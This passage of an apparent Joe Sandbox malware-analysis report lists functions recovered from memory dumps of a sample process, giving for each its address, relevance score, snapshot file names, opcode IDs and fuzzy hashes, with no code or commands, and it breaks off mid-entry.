                                            Function 00007FFD9B8F6EAD Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfc00aab3a5630391d03c7dd34ed01a38c44f6fca3edadaa133df4387b57b112
                                            • Instruction ID: cb2a0fa72c7d63738dca0d8ababe1b704bc94abd7227094f3a636fe006aaed52
                                            • Opcode Fuzzy Hash: cfc00aab3a5630391d03c7dd34ed01a38c44f6fca3edadaa133df4387b57b112
                                            • Instruction Fuzzy Hash: 9F313870B0A64D8FDB68DF98C8656ED7BE1EF58301F11027AD00AE3291DA786D45CB85
                                            Function 00007FFD9B8CAC4D Relevance: .1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37a0ba8039a4c45a60fe33e7b579e3fd9b992b80ac520833a191c01f9d9119db
                                            • Instruction ID: 3d5b0aeca8cd1947238851883fdeb59c2aae6411c29f00f3eab8cec266e6d38e
                                            • Opcode Fuzzy Hash: 37a0ba8039a4c45a60fe33e7b579e3fd9b992b80ac520833a191c01f9d9119db
                                            • Instruction Fuzzy Hash: 4B311471A0991D8FDB98EB18C895AB9B7F1FF58300F5482EA804DD3165DE35AA81CF80
                                            Function 00007FFD9B8B5193 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ede6b29adc93ccaacb9f7ad5cc0b25f6ffc85fe6403b897dd40815e7c9d920d
                                            • Instruction ID: af6d95a30620603c4c44c7169a0573ebe2fd89c57332c718be7ba19b5c3dfcdd
                                            • Opcode Fuzzy Hash: 0ede6b29adc93ccaacb9f7ad5cc0b25f6ffc85fe6403b897dd40815e7c9d920d
                                            • Instruction Fuzzy Hash: 6E318D35A1891D8FDF94EF14C865AEDB7B1FB64309F1001EA900EE3265DB719A818F81
                                            Function 00007FFD9B8FEFC9 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1438ec786a40a7f74082025b09f02a18deae26e0de2cf51d7f813c86e296922d
                                            • Instruction ID: 4499a482f929d01b81ddf8c5c0312aecdbfc404559eaa8ccf53d34f03c9803d1
                                            • Opcode Fuzzy Hash: 1438ec786a40a7f74082025b09f02a18deae26e0de2cf51d7f813c86e296922d
                                            • Instruction Fuzzy Hash: D4218331A0968D8FDB65DF68C8656ED7FB0FF59300F0501FAD40CC61A2DA349A54C781
                                            Function 00007FFD9B8C8A5D Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8c6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a82ec5747f0259b4f052654b380cb09f09b15fe057bc11e2dda7c51d39c0105a
                                            • Instruction ID: 4fb8a698d26a0fadb8ab20ceef1ec9df118ae06e9a1a6b3485b1a97d27e18d95
                                            • Opcode Fuzzy Hash: a82ec5747f0259b4f052654b380cb09f09b15fe057bc11e2dda7c51d39c0105a
                                            • Instruction Fuzzy Hash: 8A21AE31A1965D8FDB18EF58C8656FD77F1FF58310F11026BD40AE3291DA34AA158B82
                                            Function 00007FFD9B8F7BD9 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7ab8c897f27f00781017231bb00ce745c436b42226d1030689b2017a64eb2f2
                                            • Instruction ID: 6febc40c30f12ea9bb97a0d637351723c922ce5f2ef1332b5b722c240dc2966c
                                            • Opcode Fuzzy Hash: c7ab8c897f27f00781017231bb00ce745c436b42226d1030689b2017a64eb2f2
                                            • Instruction Fuzzy Hash: B8210C34E0965D8BEB68DF84C8647BCB7B1FB58301F1105BDC009A72A1DB782A81CB40
                                            Function 00007FFD9B8FF02D Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4bc9b5e06d5f948fdcd63b0c8b51f1c7945704d7d99561e97895108bfc1c765
                                            • Instruction ID: 3c020dbfd3551da5abe27f5a5f242bf058b1b69132ee38a2b96cf3ab8430a1e1
                                            • Opcode Fuzzy Hash: d4bc9b5e06d5f948fdcd63b0c8b51f1c7945704d7d99561e97895108bfc1c765
                                            • Instruction Fuzzy Hash: 73118F32A0F68D4FDB56CF649C655B87FB0FF66300B0502FBD058C71A6C665AA44C781
                                            Function 00007FFD9B8C0CE4 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a94c6760eef1f0ae35577e15f564415eda7bb7f0bf00e1dc023aa5506d116b14
                                            • Instruction ID: 20f68c975ef253f35485cdc16c80b8e34459a776b96b22c75c16f1692f995448
                                            • Opcode Fuzzy Hash: a94c6760eef1f0ae35577e15f564415eda7bb7f0bf00e1dc023aa5506d116b14
                                            • Instruction Fuzzy Hash: 4611CC74A1951D8FDFA9EB48C854AA8B3B5FF59301F1001E9D00DE7251CB71AE80CF40
                                            Function 00007FFD9B8C0D5E Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d92f7e8ecb349551ad8d329a2dc1ad7fb93937251b6f7dd3da1d97bd7bdff685
                                            • Instruction ID: 0a3276b65399b9474d190bbf9520e53e74adba15f4cfaf0d70660d07c0c982ee
                                            • Opcode Fuzzy Hash: d92f7e8ecb349551ad8d329a2dc1ad7fb93937251b6f7dd3da1d97bd7bdff685
                                            • Instruction Fuzzy Hash: 0421B874A1951D8FCBA9EB48C855AA8B3B5FF59701F5001EAD10EE7261CB71AE80CF40
                                            Function 00007FFD9B8F78B5 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 356b799c3ef900fec06fca16495b2863fdd61f3a48a8af6bfd1c2f190ec20d7d
                                            • Instruction ID: d021057e425c22c687860f08f89fa1f067e29cb4d415969e135d89cff7704050
                                            • Opcode Fuzzy Hash: 356b799c3ef900fec06fca16495b2863fdd61f3a48a8af6bfd1c2f190ec20d7d
                                            • Instruction Fuzzy Hash: 6A11BC36B0854E8FEB51EF58C855AFE3BA0FF58314B0404B6D40DC71A2DA30AA55CB81
                                            Function 00007FFD9B8D2DD7 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ebcd0409f6e5d0ee7708e49e73ad5971e7e5012f4d1be94fb742396852e3218
                                            • Instruction ID: efb22442dcb51d31079d68c88dad3e5e0c5093a0ad17e526a95b5216a282f99f
                                            • Opcode Fuzzy Hash: 1ebcd0409f6e5d0ee7708e49e73ad5971e7e5012f4d1be94fb742396852e3218
                                            • Instruction Fuzzy Hash: 5921EE70B0965D8FEBA4EF58C8947A8B3B1FF59301F1446EA800DE22A1DA345AC4CF01
                                            Function 00007FFD9B8BFAEC Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b18aef0571ccd1299b2df6d97ebd3cd3b6577e102b04dc5705b7665b4834b98
                                            • Instruction ID: 93f121af7a307f97be566d2bfb52fa4ddc0e3b4346ea1a9293cc7a8ed1ae4614
                                            • Opcode Fuzzy Hash: 1b18aef0571ccd1299b2df6d97ebd3cd3b6577e102b04dc5705b7665b4834b98
                                            • Instruction Fuzzy Hash: 7101A171D5E3C98FD752ABB448641E47FF0EF1B201F0A41EBD489CA0B3D9691A49C751
                                            Function 00007FFD9B900B71 Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 895ac4353df9bc6544968c1f366b83547634c1721456d9b0c645ff6f66d3a6f3
                                            • Instruction ID: 2f81750fc5a2e1cfa2705e0642c6f3c85a833bb616d9a9c60ba140c499f6c0d2
                                            • Opcode Fuzzy Hash: 895ac4353df9bc6544968c1f366b83547634c1721456d9b0c645ff6f66d3a6f3
                                            • Instruction Fuzzy Hash: 7A01A576E0954D8FDF94DFA8D4A15FC7BA1EF64210B14016AE01DC31A1DE31AA01C780
                                            Function 00007FFD9B9065A0 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43ae9f2043c67dfcf80a1d1e4f995c1f33a209b1692a6a226c29c6888595434d
                                            • Instruction ID: 17cd652b694b1fd4550fdaa19f74a5cc843b56ff702ae9acbb39f9ad5efd3d84
                                            • Opcode Fuzzy Hash: 43ae9f2043c67dfcf80a1d1e4f995c1f33a209b1692a6a226c29c6888595434d
                                            • Instruction Fuzzy Hash: D8211A34E0960DDFEB18DF89D494AADB7F2FF98315F148135D009972A9DB38A982CB41
                                            Function 00007FFD9B902149 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1788b941a28cbb9923ea619225115ae75348433be91954b0cc313bf490b2df3
                                            • Instruction ID: be2e435f2051be8faf7e1820b116568b4946e85b8e2017fb67cb78cc48ab1357
                                            • Opcode Fuzzy Hash: e1788b941a28cbb9923ea619225115ae75348433be91954b0cc313bf490b2df3
                                            • Instruction Fuzzy Hash: 9311E87090968D8FCF85EF68C859AA97FF0FF29301F0505AAE458D7261D7349554CB81
                                            Function 00007FFD9B902069 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 023903b1f462cfbeb51a3a6ee626b4fba672d7d187dbcb77be8c80b05f7bc61f
                                            • Instruction ID: 523ed90be32631dae14803d6cbee7e5b3dd835b3cf1766723234638e805532a6
                                            • Opcode Fuzzy Hash: 023903b1f462cfbeb51a3a6ee626b4fba672d7d187dbcb77be8c80b05f7bc61f
                                            • Instruction Fuzzy Hash: 4F111530908A8D8FCF85EF68C858AA97FF0FF29300F0501AAE408D72A2DB749544CB81
                                            Function 00007FFD9B8F7269 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4da3135da85069525eeff42be2c99861675da2772d289ca15fa467c6e8ad86c
                                            • Instruction ID: ea2f013828ac08952f415ab04904152715484020991256bff227b88316ebc661
                                            • Opcode Fuzzy Hash: b4da3135da85069525eeff42be2c99861675da2772d289ca15fa467c6e8ad86c
                                            • Instruction Fuzzy Hash: AF110C3090868D8FDF45EF68C899AEA7FF0FF29304F1505AAE419D7161DB349954CB81
                                            Function 00007FFD9B9034AA Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a00930df2fa651dd083a811d370d8b42ea5373f7c256867350f53b5aea9d97bc
                                            • Instruction ID: a66ed920b79e2f63ad1f569f405f15cb48daff1c52553bfdeb51bbf037c35ddb
                                            • Opcode Fuzzy Hash: a00930df2fa651dd083a811d370d8b42ea5373f7c256867350f53b5aea9d97bc
                                            • Instruction Fuzzy Hash: 2F113A74E2DA4D9EEBA4DB998851BA8B7F1EF5D300F1081B5C04DA21A1DA386A808F41
                                            Function 00007FFD9B8F8CC9 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a81c9fd34f087f349ee18c1a275183d2f5e256ba6c8c4e8bcfa417d418134313
                                            • Instruction ID: c7dfd61391eab43f39ca11a02c470138937d56c19a08fa7a0c923e9af5fff7f4
                                            • Opcode Fuzzy Hash: a81c9fd34f087f349ee18c1a275183d2f5e256ba6c8c4e8bcfa417d418134313
                                            • Instruction Fuzzy Hash: E5014C31909A8C8FCB85EF28C869AD97FF0FF69304F0501AAD409C71A2D735A954CB81
                                            Function 00007FFD9B8CE545 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f1a152a475c5f185389591bd3789c42063096d0aacd9d863d9ca7ee3ac16c3b
                                            • Instruction ID: ed83b85fbe5651fb7fe447b33d055c9e3f5b35d4dd6bac5d130c86662ea8c344
                                            • Opcode Fuzzy Hash: 3f1a152a475c5f185389591bd3789c42063096d0aacd9d863d9ca7ee3ac16c3b
                                            • Instruction Fuzzy Hash: FD111F70A1991D8FDB64EB44C4A4BFCB7B1FB58311F5141BAD00DD36A1CA343A81CB40
                                            Function 00007FFD9B902160 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01f8a854155c18305390354bb870566a879b6e5a7af3eff505e1eb1f32cb5eec
                                            • Instruction ID: d287edc5831284c5a37170ad47247f503eafff0054584ca65be91a833f4292e3
                                            • Opcode Fuzzy Hash: 01f8a854155c18305390354bb870566a879b6e5a7af3eff505e1eb1f32cb5eec
                                            • Instruction Fuzzy Hash: 8D019670914A4D9FDF84EF68C849AEA7BF0FB68305F00456AA819D3264DB30A594CB81
                                            Function 00007FFD9B902080 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 235930c003bc9c7171615027db7eee6b487a465107393f834ebb6c280e2db333
                                            • Instruction ID: a1fe8dbc079930b06edb2117a1b8ffa46e3f1571a1ec296e9d641e6f6c1cd2ec
                                            • Opcode Fuzzy Hash: 235930c003bc9c7171615027db7eee6b487a465107393f834ebb6c280e2db333
                                            • Instruction Fuzzy Hash: 4A01A870914A4D9FDF84EF68C849AEE7BF0FB68305F10456AA81DD3264DB70E694CB81
                                            Function 00007FFD9B8D1768 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae90944fd13ea85642e13bd3732c68940585700ad5fac05cae1323f79220b052
                                            • Instruction ID: 96fac698b648e70babe061b79fab4be39a8304cc95122cc0eeb20ab46fe5b993
                                            • Opcode Fuzzy Hash: ae90944fd13ea85642e13bd3732c68940585700ad5fac05cae1323f79220b052
                                            • Instruction Fuzzy Hash: C801DA70914A4D8FDF84EF58C849AEE77F0FB68305F01456AA81DD3260DB74A594CB81
                                            Function 00007FFD9B8F9A09 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b7bf4b357b2549cf5a214e2222efdd18e49b5d26c746a9d7ce608706753cd02
                                            • Instruction ID: b0b74b3956af220adaba6cac29b5f6eb5e4bb2bf7af146077970418274e078a6
                                            • Opcode Fuzzy Hash: 1b7bf4b357b2549cf5a214e2222efdd18e49b5d26c746a9d7ce608706753cd02
                                            • Instruction Fuzzy Hash: 42011E3090968D8FCB86DF68C854AEE7FB0FF69304F05059AD418D72A2D774DA54CB81
                                            Function 00007FFD9B905B39 Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3b453004a4db3996878675b96d416b0a0612dcb5b118e8c2a258a4e7619e916
                                            • Instruction ID: 441cb59d04558ef4779dc641bd57eaea7fce9e7eccd8aafed97e9f26a8739cdb
                                            • Opcode Fuzzy Hash: e3b453004a4db3996878675b96d416b0a0612dcb5b118e8c2a258a4e7619e916
                                            • Instruction Fuzzy Hash: 2D011A30908A8D8FDF85EF68C898AA97BB0FF25300F0505ABD419D71A2DB359A94CB41
                                            Function 00007FFD9B8FF499 Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bbb47b169bcab51cb51cffbbe6a15e053ed65c017a3d354588947c8a164b1a66
                                            • Instruction ID: 4f75305f9b01b772ffbe4e9f9a8a3f0702e92a410d5256c9b121138bd0506608
                                            • Opcode Fuzzy Hash: bbb47b169bcab51cb51cffbbe6a15e053ed65c017a3d354588947c8a164b1a66
                                            • Instruction Fuzzy Hash: 32015A30A0968D8FCB85DF68C858AAE7FF0FF69310F0545AAD418C72A2D7349A54CB81
                                            Function 00007FFD9B8F7349 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59c0ec920b337d19af1c7136fb88a3b3692a2e9cb78c2ad8a4cc449bc5263a3e
                                            • Instruction ID: 7f09da2c43af40bc6f93452f21a502ffda53f384697f7d256693e48bd1de2d0e
                                            • Opcode Fuzzy Hash: 59c0ec920b337d19af1c7136fb88a3b3692a2e9cb78c2ad8a4cc449bc5263a3e
                                            • Instruction Fuzzy Hash: AD014F3050968C8FDB46DF54C898AE97FB0FF69300F5501DBD409C71A2D7359994CB81
                                            Function 00007FFD9B906819 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05508b3842ef510e9707a10dae637c304b0adb1409ee7ba8bf9dd6dc8b69f886
                                            • Instruction ID: 6aba2ce5f76c0817c28d296aef6bcdd8bf874b0d27eec8ef08d3d3ab95291a4d
                                            • Opcode Fuzzy Hash: 05508b3842ef510e9707a10dae637c304b0adb1409ee7ba8bf9dd6dc8b69f886
                                            • Instruction Fuzzy Hash: 21014B3090968C8FCB86DF64C864AE97FB0FF6A300F0540DBE408C72A2C7359A94CB81
                                            Function 00007FFD9B906759 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d49fc5b81b11cfc7871fc40bd5ac79653135f316e161f871a93bb16381898e04
                                            • Instruction ID: 98d50515358b0c0f8272b0ce0199c39a6e8ea5cd91fe57742b1ccd78fd457621
                                            • Opcode Fuzzy Hash: d49fc5b81b11cfc7871fc40bd5ac79653135f316e161f871a93bb16381898e04
                                            • Instruction Fuzzy Hash: B2014F3490968C8FCB55DF64C865A997FF0FF65300F0500EAD449C71A6D7359954CB41
                                            Function 00007FFD9B900BA9 Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b11e282ac57d0a7166c0d3fad0c2d2425f5e5619ccae5cafb9a02102a69365a
                                            • Instruction ID: 474f2dca6db814bf4f300e743094f6e30893653c099179f0cd5264dbd5d95c5f
                                            • Opcode Fuzzy Hash: 0b11e282ac57d0a7166c0d3fad0c2d2425f5e5619ccae5cafb9a02102a69365a
                                            • Instruction Fuzzy Hash: 84014B3191968D8FCB85DF68C868AAE7BF0FF25304F0505EAD459C71A2DB349A44CB41
                                            Function 00007FFD9B8F9A20 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
